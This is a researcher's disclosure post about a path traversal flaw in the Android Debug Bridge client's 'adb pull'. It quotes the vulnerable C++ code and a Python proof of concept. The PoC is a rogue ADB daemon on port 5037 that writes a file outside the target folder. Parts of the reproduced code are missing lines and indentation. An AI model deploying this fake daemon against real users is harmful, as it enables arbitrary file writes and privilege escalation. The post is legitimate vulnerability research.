Arbitrary File Write On Client By ADB Pull
The Android Debug Bridge, ADB, contains a long-standing vulnerability. It can have a rather severe impact, but only under some pretty unusual circumstances. Tl;dr: Executing an adb pull
command against a malicious Android device or ADB daemon can lead to arbitrary file writes, pretty easily escalating to code execution.
ADB Architecture #
There are three notable pieces worth discussing, when it comes to ADB:
- Device-side ADB server (this runs on your Android device and facilitates debugging, running shells, etc)
- ADB daemon (this runs on your machine on port 5037 and talks to the device side, acting as a dumb proxy)
- ADB client (this talks to the ADB daemon)
Pull process #
We’re going to examine what happens if you run a simple pull command: adb pull /foo
- The ADB client (hereafter just referred to as
) attempts to connect to localhost:5037- If it fails to connect, the ADB daemon is started automatically
- ADB opens the
service on the device - ADB sends a
message (equivalent to the syscall) for/foo
to determine if it’s a file or directory - If it’s a file, it simply sends a
message to get the contents, and writes to a local file calledfoo
- If it’s a directory, ADB sends a
message to get the directory contents, then recurses into any subsequent directories, creating them and pulling contents as needed
Pulling a file isn’t very interesting and there’s no need to dive into it here, but the fact that pull
doesn’t differentiate between files and directories (from a UI standpoint) is interesting. This means that unless you’re 100% certain of what you’re pulling, you might get a directory instead of a file, or vice versa.
The Bug #
The vulnerable code here is in file_sync_client.cpp:
static bool remote_build_list(SyncConnection& sc, std::vector<copyinfo>* file_list,
const std::string& rpath, const std::string& lpath) {
std::vector<copyinfo> dirlist;
std::vector<copyinfo> linklist;
// Add an entry for the current directory to ensure it gets created before pulling its contents.
copyinfo ci(android::base::Dirname(lpath), android::base::Dirname(rpath),
android::base::Basename(lpath), S_IFDIR);
// Put the files/dirs in rpath on the lists.
auto callback = [&](unsigned mode, uint64_t size, uint64_t time, const char* name) {
if (IsDotOrDotDot(name)) {
copyinfo ci(lpath, rpath, name, mode);
if (S_ISDIR(mode)) {
} else if (S_ISLNK(mode)) {
} else {
if (!should_pull_file(ci.mode)) {
sc.Warning("skipping special file '%s' (mode = 0o%o)", ci.rpath.c_str(), ci.mode);
ci.skip = true;
ci.time = time;
ci.size = size;
if (!sync_ls(sc, rpath, callback)) {
return false;
// Check each symlink we found to see whether it's a file or directory.
for (copyinfo& link_ci : linklist) {
struct stat st;
if (!sync_stat_fallback(sc, link_ci.rpath, &st)) {
sc.Warning("stat failed for path %s: %s", link_ci.rpath.c_str(), strerror(errno));
if (S_ISDIR(st.st_mode)) {
} else {
// Recurse into each directory we found.
while (!dirlist.empty()) {
copyinfo current = dirlist.back();
if (!remote_build_list(sc, file_list, current.rpath, current.lpath)) {
return false;
return true;
This recursively builds the list of files to pull. To prevent loops, it doesn’t recurse into directories named .
or ..
. Good! Unfortunately, it does no validation on filenames whatsoever. So if a malicious ADB daemon (or device-side ADB service) were to send such a file back, we end up with a directory traversal.
Proof of Concept #
The following is a Python 2.7 (don’t @ me) proof of concept for this bug:
from socket import *
import struct, thread
S_IFDIR = 0040777
S_IFREG = 0100600
def pathInfo(path):
print 'Returning path info for:', path
if path == '/exploit':
return DIR, 0
elif '..' in path:
return FILE, len(pathContents(path))
return 0, 0
def pathList(path):
print 'Returning path list for:', path
if path == '/exploit/':
return ['../../../../../../../../../../../../../../../tmp/TESTING']
return []
def pathContents(path):
return 'ADB directory traversal test. Have a pleasant day!'
class Client(object):
def __init__(self, sock):
self.sock = sock
self.transportId = 0
print 'Running loop for client'
print 'Closing client socket'
def recvall(self, count):
print 'Receiving', count
buf = ''
while len(buf) < count:
tbuf = self.sock.recv(count - len(buf))
if tbuf == '':
raise Exception('Disconnected')
buf += tbuf
print `buf`
return buf
def recvbuf(self):
return self.recvall(int(self.recvall(4), 16))
def sendall(self, buf):
return self.sock.sendall(buf)
def sendbuf(self, buf):
return self.sock.sendall(('%04x' % len(buf)) + buf)
def handle_connect(self):
name = self.recvbuf()
print 'Connecting to service:', `name`
print 'Returned OKAY'
if name == 'host:version':
print 'Sending version'
self.sendbuf('%04x' % 41)
return False
elif name == 'host:features':
print 'Sending features'
return False
elif name == 'host:tport:any':
self.sendall(struct.pack('<Q', self.transportId))
self.transportId += 1
elif name == 'sync:':
return False
elif name.startswith('shell:'):
print 'Trying to run command, lol'
self.sendall('10. Not supported\n')
return False
elif name == 'host:kill':
print 'No mere mortal can kill me'
return False
def sync(self):
while True:
id = self.recvall(4)
path_len, = struct.unpack('<I', self.recvall(4))
path = self.recvall(path_len)
print `id`, 'on', `path`
if id == 'STA2':
mode, size = pathInfo(path)
0, # error
0, # dev
0, # ino
mode, # mode
0, # nlink
0, # uid
0, # gid
size, # size
0, # atime
0, # mtime
0 # ctime
elif id == 'STAT':
mode, size = pathInfo(path)
mode, # mode
size, # size
0 # mtime
elif id == 'LIS2':
for name in list(pathList(path)) + ['~~~DONE~~~']:
if name != '~~~DONE~~~':
mode, size = pathInfo(path + name)
mode, size = 0, 0
0, # error
0, # dev
0, # ino
mode, # mode
0, # nlink
0, # uid
0, # gid
size, # size
0, # atime
0, # mtime
0, # ctime
len(name) if name != '~~~DONE~~~' else 0
if name != '~~~DONE~~~':
elif id == 'LIST':
for name in list(pathList(path)) + ['~~~DONE~~~']:
if name != '~~~DONE~~~':
mode, size = pathInfo(path + name)
mode, size = 0, 0
mode, # mode
size, # size
0, # mtime
len(name) if name != '~~~DONE~~~' else 0
if name != '~~~DONE~~~':
elif id == 'RECV':
contents = pathContents(path)
for i in xrange(0, len(contents), 65536):
data = contents[i:i+65536]
print 'Sending', `data`
self.sendall(struct.pack('<I', len(data)))
print 'Done??'
elif id == 'QUIT':
print 'Unknown command in sync:', `id`
def loop(self):
while True:
print 'In loop'
if self.handle_connect() is False:
serv = socket(AF_INET, SOCK_STREAM)
serv.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
serv.bind(('', 5037))
while True:
sock, _ = serv.accept()
thread.start_new_thread(Client, (sock, ))
- Run this file
- Run
adb pull /exploit
- Run
cat /tmp/TESTING
You can see from the pathList()
and pathContents()
functions that it’s trivial to write any file on the filesystem. Bear in mind, this happens in the context of the user running the ADB client, so you’re limited to files they can write. However, that makes it pretty great for privilege escalation on a multi-user system.
Future Work #
As mentioned earlier, it may be possible to exploit this via a device with a malicious ADB service present. This is left as an exercise to the reader.
Reporting Timeline #
- Reported to Google on November 11, 2020
- Determined to be ineligible for Android’s bug bounty program on November 18, 2020 (While I would’ve hoped for this to be otherwise, it’s understandable – it requires very specific circumstances to exploit)
- It should be noted that if proof of exploitability from a malicious device were presented, this may reverse the decision
- Disclosed November 19, 2020